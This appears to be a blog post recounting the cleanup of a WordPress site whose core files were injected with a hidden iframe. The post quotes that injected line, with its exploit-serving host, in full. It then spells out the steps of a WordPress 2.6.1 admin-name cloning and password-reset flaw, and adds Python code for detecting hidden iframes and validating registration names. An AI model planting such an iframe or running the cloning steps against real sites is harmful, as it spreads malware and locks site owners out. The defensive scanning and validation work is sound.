Help, my WordPress blog is giving a virus warning!

I got called in to resolve an issue on a WordPress blog today. On the surface it looked as if the administration side of the site had broken, but the real cause turned out to be much darker than that.

Looking at the source of the page, I could see that lines were being inserted on all pages that tried to open an iFrame onto a website that used a browser exploit to try and install a virus on your computer. If my browser wasn’t patched and I wasn’t using a virus scanner, it could have been a ton of work for me to clean up. The question was, where was that iFrame coming from?

It turned out that a couple (4 actually) of WordPress files had been compromised and had extra lines added to them to open this iFrame. The files were:

  • wp-feed.php
  • wp-blog-header.php
  • wp-config.php
  • wp-load.php

This was the extra line:

<iframe src="http://google-analitics.ws/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>

These files are used in every WordPress page load and were the cause of the extra iFrame. The big question was how the files got compromised in the first place. They were set to the correct permissions, so could only have been changed by someone (or a script) with root access to the server. Unfortunately this is not something you can protect against. Always make sure your blog is living on a reliable host and remember, “It’s wilder than Las Vegas out there”.
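If you want to find this kind of injection rather than stumble on it in the page source, a quick scan of the PHP tree for hidden iframes is enough. The script below is an added example (not code from this post, from WordPress or from any host): it flags any <iframe> tag whose width and height are both 0, which is what the injected line above looks like, and also the style="display:none" variant, which goes beyond the post. The files it scans are constructed in a temporary directory so it runs offline, and the iframe URL in them is a placeholder rather than the domain from the post.

```python
"""Find hidden <iframe> injections in a WordPress tree.

Added example for this post, not WordPress or hosting-provider code. It
walks a directory, reads every .php file and reports lines containing an
<iframe> hidden the way the injected line on the page is (width and
height both 0); it also flags the style="display:none" variant. The
files scanned here are constructed in a temporary directory; the iframe
URL in them is a placeholder, not the domain from the post.
"""
import os
import re
import tempfile

# An <iframe ...> tag whose attributes include width=0 and height=0, in
# either order, or an inline style hiding it. The lookaheads stay inside
# the tag because [^>] cannot run past the closing '>'.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?:"
    r"(?=[^>]*\bwidth\s*=\s*['\"]?0(?:px)?['\"]?)"
    r"(?=[^>]*\bheight\s*=\s*['\"]?0(?:px)?['\"]?)"
    r"|(?=[^>]*display\s*:\s*none)"
    r")[^>]*>",
    re.IGNORECASE,
)


def scan_file(path):
    """Return [(line_number, matched_tag), ...] for one file."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for number, line in enumerate(fh, start=1):
            for match in HIDDEN_IFRAME.finditer(line):
                hits.append((number, match.group(0)))
    return hits


def scan_tree(root):
    """Map each flagged .php file (relative to root) to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


# Constructed sample tree: two injected core files, one clean theme file
# with a legitimate visible embed, and a non-PHP file the scanner ignores.
SAMPLE_FILES = {
    "wp-config.php": (
        "<?php\n"
        "define('DB_NAME', 'blog');\n"
        "?>\n"
        '<iframe src="http://example.invalid/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>\n'
    ),
    "wp-load.php": (
        "<?php\n"
        "require_once dirname(__FILE__) . '/wp-config.php';\n"
        "?>\n"
        '<iframe style="display:none" src="http://example.invalid/out.php"></iframe>\n'
    ),
    "wp-content/themes/demo/index.php": (
        "<?php get_header(); ?>\n"
        '<iframe width="560" height="315" src="http://example.invalid/embed"></iframe>\n'
    ),
    "readme.txt": '<iframe width="0" height="0" src="http://example.invalid/"></iframe>\n',
}


def build_sample_tree():
    """Write the constructed files under a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def flagged_files():
    """Sorted relative paths the scanner flags in the sample tree."""
    return sorted(scan_tree(build_sample_tree()))


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, hits in sorted(scan_tree(root).items()):
        for number, tag in hits:
            print(f"{rel}:{number}: {tag}")
```

Run it against the real document root instead of the sample tree and any hit in a core file such as wp-config.php or wp-load.php is a compromise until proven otherwise, since those files have no business emitting markup at all. A match in a theme file needs a human look, because themes do legitimately embed iframes.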

WordPress 2.6.1 Exploit: Upgrade to avoid hack

I was reading around today, after cleaning up a website that got hacked, when I saw an example of a vulnerability that exists in WordPress 2.6.1. The security hole is this:

Imagine a blog site using WordPress 2.6.1 whose web address is www.hackme.com. When you type http://www.hackme.com/wp-login.php?action=register into your address bar, the new user registration page comes up!

After that we type our user name as “admin                                                       x” (make sure there are 52 space characters between “admin” and “x”). Then type your e-mail address into the next textbox and click register. By doing this we are cloning the “admin” user name. Your password will come to your e-mail address shortly. You will not be able to log in with this information directly, so open the same page again and click “forgot password”, type in your own e-mail address and you will receive the link to reset the admin password. Once you click the reset link, a new password will be generated and sent to the real owner of the website.

Now, although people can’t log in with that password, it can prove to be very annoying and can even be used to implement a denial-of-service attack by continually changing the admin’s password. How can you address the issue? Either upgrade to WordPress 2.6.2 or disable user registrations.
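The underlying mistake is that uniqueness was decided on the raw string the visitor typed, while the account was later matched on something looser, so a padded “admin” was accepted as new and then treated as the real one. The check below is an added example (not WordPress code and not the 2.6.2 fix) of the defensive rule for any registration form: refuse names containing whitespace or control characters outright, and compare a canonical form against existing logins. The existing-login set is constructed for the demo, the canonical form goes beyond the post by also folding case and Unicode normalising, and the exact database behaviour that made the padded name match in 2.6.1 is not described on the page and is not modelled here.

```python
"""Reject registration names that would collide with an existing login.

Added example, not WordPress code. The rule: uniqueness is decided on a
canonical form of the name, never on the raw string, and any name that
contains whitespace or control characters is refused before it reaches
the uniqueness check. The existing-login set is a constructed sample.
"""
import unicodedata

# Constructed sample of logins already in the user table.
EXISTING_LOGINS = {"admin", "editor", "jane"}


def _is_space_or_control(ch):
    # Unicode category 'C*' covers control, format and unassigned code points.
    return ch.isspace() or unicodedata.category(ch)[0] == "C"


def canonical(login):
    """Form used for uniqueness: NFKC-normalised, whitespace and control
    characters removed, case folded (goes beyond the whitespace case on
    the page so look-alike registrations are caught too)."""
    text = unicodedata.normalize("NFKC", login)
    return "".join(c for c in text if not _is_space_or_control(c)).casefold()


def rejection_reason(requested, existing=EXISTING_LOGINS):
    """Return None if the name may be registered, otherwise why not."""
    if requested == "":
        return "empty"
    if any(_is_space_or_control(c) for c in requested):
        return "contains whitespace or control characters"
    taken = {canonical(name) for name in existing}
    if canonical(requested) in taken:
        return "collides with an existing login"
    return None


def demo():
    """Outcome for the padded name from the post plus a few variants."""
    padded = "admin" + " " * 52 + "x"   # the name used in the post
    cases = {
        "padded admin": padded,
        "Admin": "Admin",
        "admin with NBSP": "ad\u00a0min",
        "newuser": "newuser",
    }
    return {label: rejection_reason(name) for label, name in cases.items()}


if __name__ == "__main__":
    for label, reason in demo().items():
        print(f"{label!r}: {reason or 'accepted'}")
```

Disabling registrations, as the post recommends, removes the attack surface entirely; where registrations must stay open, this is the shape of check that belongs in front of the insert, and it must use the same canonical form that the login and password-reset paths use to look a user up.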